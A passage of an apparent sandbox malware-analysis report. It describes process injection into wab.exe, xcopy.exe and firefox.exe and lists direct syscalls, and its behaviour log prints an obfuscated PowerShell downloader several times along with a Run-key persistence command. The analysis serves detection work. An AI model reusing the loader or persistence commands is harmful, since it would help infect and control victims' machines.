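    edges = sorted({(r["src"], r["target"], r["sig"]) for r in records if r["target"]})
    per_proc = defaultdict(set)
    for r in records:
        if r["sig"].startswith("Nt"):
            per_proc[r["src"]].add(r["sig"])
    direct = {p: sorted(s & INJECTION_PRIMITIVES)
              for p, s in per_proc.items() if s & INJECTION_PRIMITIVES}
    return {"peb_reads": peb, "injection_edges": edges, "direct_syscalls": direct}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_ROWS).items():
        print(key, dict(value) if isinstance(value, Counter) else value)
```

On the fixture the injection graph comes out as powershell.exe writing into wab.exe, wab.exe mapping a section into TsrCaEwNrfOKANGWcsg.exe, and xcopy.exe mapping into firefox.exe and queuing an APC into TsrCaEwNrfOKANGWcsg.exe, with NtMapViewOfSection and NtWriteVirtualMemory as the direct syscalls that matter; the full section above adds the remaining edges and primitives.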

        HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtOpenKeyEx: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtReadFile: Direct from: 0x77382ADC
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtAllocateVirtualMemory: Direct from: 0x773848EC
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtOpenKeyEx: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtQueryValueKey: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: NULL target: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe protection: execute and read and write
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | Section loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: NULL target: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe protection: read write
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: NULL target: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\xcopy.exe | Thread APC queued: target process: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3240000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 323FA28
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping %.%.%.%
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. 
Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. 
Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
(Run-key persistence. The value is REG_EXPAND_SZ, so %Akkvisitiv% is expanded at logon and must then resolve to the interpreter that runs the rest of the data; what that variable is set to is not shown in this section. The code to run is read from the registry value Xenoplastic under HKCU\Respirometres, so triage should capture both the Run value "Achaque" and that key.)
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe | Process created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
Source: C:\Windows\SysWOW64\xcopy.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$retorsionshandlingenllustrationer = 1;$elytrigerous='s';$elytrigerous+='ubstrin';$elytrigerous+='g';function programregningsfunktionens($ridderne){$retorsionshandlingennfraocular=$ridderne.length-$retorsionshandlingenllustrationer;for($retorsionshandlingen=5; $retorsionshandlingen -lt $retorsionshandlingennfraocular; $retorsionshandlingen+=(6)){$outsmokes+=$ridderne.$elytrigerous.invoke( $retorsionshandlingen, $retorsionshandlingenllustrationer);}$outsmokes;}function gracy216($begrendes){. ($antediluvianske) ($begrendes);}$diskoskasteren=programregningsfunktionens 's.perm l deolandszaccomiturbolbrystlsu.loa inte/linje5.ilfo.brneb0b,ddi illi(mamelwkortsiexoranbowkndsp,dho.urvew,ndtrsfjase utotnmileptb,een marga1san.u0balli.montr0h,rsk;.ykke brakpwxanthi ,ervnreprs6trova4filet;d,awc vidnxt,gue6admin4cotra;insci un btrtogstvegipt:inter1riv l2for e1 daun. gens0sknde)neutr trak grepudeguldkc belaktandlov.rde/ edb2uheld0sknhe1elek.0nell,0 ,rot1un,en0skibi1savne mordfautogiko,merde,inearom,fshipbohapaxxstork/inten1splas2ds,es1 ilsk.fylds0capri ';$sprayens=programregningsfunktionens 'nondeu rubasva neebe,kir for -,geblar.bbegholose ta dn paratprivi ';$reprogrammes=programregningsfunktionens 'stuf.hl.muctversit subspcosmo:etcif/taksa/ impl8morph7far,n.bronz1anal,2proc,1ungl .unpol1unper0f,nda5varmt. gr,n5roc,e4,sent/seksaooverrmmismamt.bulelandlsforcetmis,aratropudiscop,iske.aarsadunsanesaanipbrodfldiameonamatysawai ';$kretidseffekternes=programregningsfunktionens 'vejkr>phisa ';$antediluvianske=programregningsfunktionens 'etam.iraadie saddxfasts ';$gunlaying='forraadnelig';gracy216 (programregningsfunktionens ' l urs atikesignatrecon- genecpen,eo.endrnnovumtprintelailanporphtst ir peatw-anglopobitaa elvetsymbohp,esh trvemt,ough: ,aad\ afv i cerid.roldrcheskt udpasfilerfmenneo c,lorsol,cesuavenphaneiindlenaabengseepssunche1pre i9wi,db7super.radiotniveax t rrt duod evole-un mmv selramoraklpericuunmoueadvoc melle$samstg estiu appenre,orl teleaanmrkysaponiimmunn behvgah.eh;chabo ');gracy216 (programregningsfunktionens ' framihabi,fcacos larit( grectv.stfe.olfistalertridge-ozonopju iaastoddttabarhpigl, pse thaand:mosen\kompli .oemd ilker tigeteperoskrig,f collopl.udr subsemad lnnonmoikromgnenok g saxoshaand1 twir9op oe7 lov..fedtst an txfarvet rede) rtss{ ka.me kropxfaksiiudsket sang} un s; gro, ');$kvrne = programregningsfunktionens 'nedraeunconcuan.ghpet oopaatn munke%kys.eacasanpfy,depsixpedover agravit orema ragl%euboe\devels lovgalaa,ngplat snematgbug.gn jalaitegninovercgarbe.esl,knr forsn p.ileafsvo. unshispirinm larth ved .fsla&neonr&be.ri adiabetro ecudganhsvovloeksp trink$ambol ';gracy216 (programregningsfunktionens 'slide$svmnigimperlavn,sot aadb rag,apie alfordr: demivgoogoiquittrshop k trknsmycetofodbomhomemhdr sieeffemd de,isdawsst bf eyoprikpbrancepatrunsongbs thri=nonam(am.utcpillamsulted stev toksi/ ilhecrajah bed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$retorsionshandlingenllustrationer = 1;$elytrigerous='s';$elytrigerous+='ubstrin';$elytrigerous+='g';function programregningsfunktionens($ridderne){$retorsionshandlingennfraocular=$ridderne.length-$retorsionshandlingenllustrationer;for($retorsionshandlingen=5; $retorsionshandlingen -lt $retorsionshandlingennfraocular; $retorsionshandlingen+=(6)){$outsmokes+=$ridderne.$elytrigerous.invoke( $retorsionshandlingen, $retorsionshandlingenllustrationer);}$outsmokes;}function gracy216($begrendes){. ($antediluvianske) ($begrendes);}$diskoskasteren=programregningsfunktionens 's.perm l deolandszaccomiturbolbrystlsu.loa inte/linje5.ilfo.brneb0b,ddi illi(mamelwkortsiexoranbowkndsp,dho.urvew,ndtrsfjase utotnmileptb,een marga1san.u0balli.montr0h,rsk;.ykke brakpwxanthi ,ervnreprs6trova4filet;d,awc vidnxt,gue6admin4cotra;insci un btrtogstvegipt:inter1riv l2for e1 daun. gens0sknde)neutr trak grepudeguldkc belaktandlov.rde/ edb2uheld0sknhe1elek.0nell,0 ,rot1un,en0skibi1savne mordfautogiko,merde,inearom,fshipbohapaxxstork/inten1splas2ds,es1 ilsk.fylds0capri ';$sprayens=programregningsfunktionens 'nondeu rubasva neebe,kir for -,geblar.bbegholose ta dn paratprivi ';$reprogrammes=programregningsfunktionens 'stuf.hl.muctversit subspcosmo:etcif/taksa/ impl8morph7far,n.bronz1anal,2proc,1ungl .unpol1unper0f,nda5varmt. gr,n5roc,e4,sent/seksaooverrmmismamt.bulelandlsforcetmis,aratropudiscop,iske.aarsadunsanesaanipbrodfldiameonamatysawai ';$kretidseffekternes=programregningsfunktionens 'vejkr>phisa ';$antediluvianske=programregningsfunktionens 'etam.iraadie saddxfasts ';$gunlaying='forraadnelig';gracy216 (programregningsfunktionens ' l urs atikesignatrecon- genecpen,eo.endrnnovumtprintelailanporphtst ir peatw-anglopobitaa elvetsymbohp,esh trvemt,ough: ,aad\ afv i cerid.roldrcheskt udpasfilerfmenneo c,lorsol,cesuavenphaneiindlenaabengseepssunche1pre i9wi,db7super.radiotniveax t rrt duod evole-un mmv selramoraklpericuunmoueadvoc melle$samstg estiu appenre,orl teleaanmrkysaponiimmunn behvgah.eh;chabo ');gracy216 (programregningsfunktionens ' framihabi,fcacos larit( grectv.stfe.olfistalertridge-ozonopju iaastoddttabarhpigl, pse thaand:mosen\kompli .oemd ilker tigeteperoskrig,f collopl.udr subsemad lnnonmoikromgnenok g saxoshaand1 twir9op oe7 lov..fedtst an txfarvet rede) rtss{ ka.me kropxfaksiiudsket sang} un s; gro, ');$kvrne = programregningsfunktionens 'nedraeunconcuan.ghpet oopaatn munke%kys.eacasanpfy,depsixpedover agravit orema ragl%euboe\devels lovgalaa,ngplat snematgbug.gn jalaitegninovercgarbe.esl,knr forsn p.ileafsvo. unshispirinm larth ved .fsla&neonr&be.ri adiabetro ecudganhsvovloeksp trink$ambol ';gracy216 (programregningsfunktionens 'slide$svmnigimperlavn,sot aadb rag,apie alfordr: demivgoogoiquittrshop k trknsmycetofodbomhomemhdr sieeffemd de,isdawsst bf eyoprikpbrancepatrunsongbs thri=nonam(am.utcpillamsulted stev toksi/ ilhecrajah bed
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$retorsionshandlingenllustrationer = 1;$elytrigerous='s';$elytrigerous+='ubstrin';$elytrigerous+='g';function programregningsfunktionens($ridderne){$retorsionshandlingennfraocular=$ridderne.length-$retorsionshandlingenllustrationer;for($retorsionshandlingen=5; $retorsionshandlingen -lt $retorsionshandlingennfraocular; $retorsionshandlingen+=(6)){$outsmokes+=$ridderne.$elytrigerous.invoke( $retorsionshandlingen, $retorsionshandlingenllustrationer);}$outsmokes;}function gracy216($begrendes){. ($antediluvianske) ($begrendes);}$diskoskasteren=programregningsfunktionens 's.perm l deolandszaccomiturbolbrystlsu.loa inte/linje5.ilfo.brneb0b,ddi illi(mamelwkortsiexoranbowkndsp,dho.urvew,ndtrsfjase utotnmileptb,een marga1san.u0balli.montr0h,rsk;.ykke brakpwxanthi ,ervnreprs6trova4filet;d,awc vidnxt,gue6admin4cotra;insci un btrtogstvegipt:inter1riv l2for e1 daun. gens0sknde)neutr trak grepudeguldkc belaktandlov.rde/ edb2uheld0sknhe1elek.0nell,0 ,rot1un,en0skibi1savne mordfautogiko,merde,inearom,fshipbohapaxxstork/inten1splas2ds,es1 ilsk.fylds0capri ';$sprayens=programregningsfunktionens 'nondeu rubasva neebe,kir for -,geblar.bbegholose ta dn paratprivi ';$reprogrammes=programregningsfunktionens 'stuf.hl.muctversit subspcosmo:etcif/taksa/ impl8morph7far,n.bronz1anal,2proc,1ungl .unpol1unper0f,nda5varmt. gr,n5roc,e4,sent/seksaooverrmmismamt.bulelandlsforcetmis,aratropudiscop,iske.aarsadunsanesaanipbrodfldiameonamatysawai ';$kretidseffekternes=programregningsfunktionens 'vejkr>phisa ';$antediluvianske=programregningsfunktionens 'etam.iraadie saddxfasts ';$gunlaying='forraadnelig';gracy216 (programregningsfunktionens ' l urs atikesignatrecon- genecpen,eo.endrnnovumtprintelailanporphtst ir peatw-anglopobitaa elvetsymbohp,esh trvemt,ough: ,aad\ afv i cerid.roldrcheskt udpasfilerfmenneo c,lorsol,cesuavenphaneiindlenaabengseepssunche1pre i9wi,db7super.radiotniveax t rrt duod evole-un mmv selramoraklpericuunmoueadvoc melle$samstg estiu appenre,orl teleaanmrkysaponiimmunn behvgah.eh;chabo ');gracy216 (programregningsfunktionens ' framihabi,fcacos larit( grectv.stfe.olfistalertridge-ozonopju iaastoddttabarhpigl, pse thaand:mosen\kompli .oemd ilker tigeteperoskrig,f collopl.udr subsemad lnnonmoikromgnenok g saxoshaand1 twir9op oe7 lov..fedtst an txfarvet rede) rtss{ ka.me kropxfaksiiudsket sang} un s; gro, ');$kvrne = programregningsfunktionens 'nedraeunconcuan.ghpet oopaatn munke%kys.eacasanpfy,depsixpedover agravit orema ragl%euboe\devels lovgalaa,ngplat snematgbug.gn jalaitegninovercgarbe.esl,knr forsn p.ileafsvo. unshispirinm larth ved .fsla&neonr&be.ri adiabetro ecudganhsvovloeksp trink$ambol ';gracy216 (programregningsfunktionens 'slide$svmnigimperlavn,sot aadb rag,apie alfordr: demivgoogoiquittrshop k trknsmycetofodbomhomemhdr sieeffemd de,isdawsst bf eyoprikpbrancepatrunsongbs thri=nonam(am.utcpillamsulted stev toksi/ ilhecrajah bed
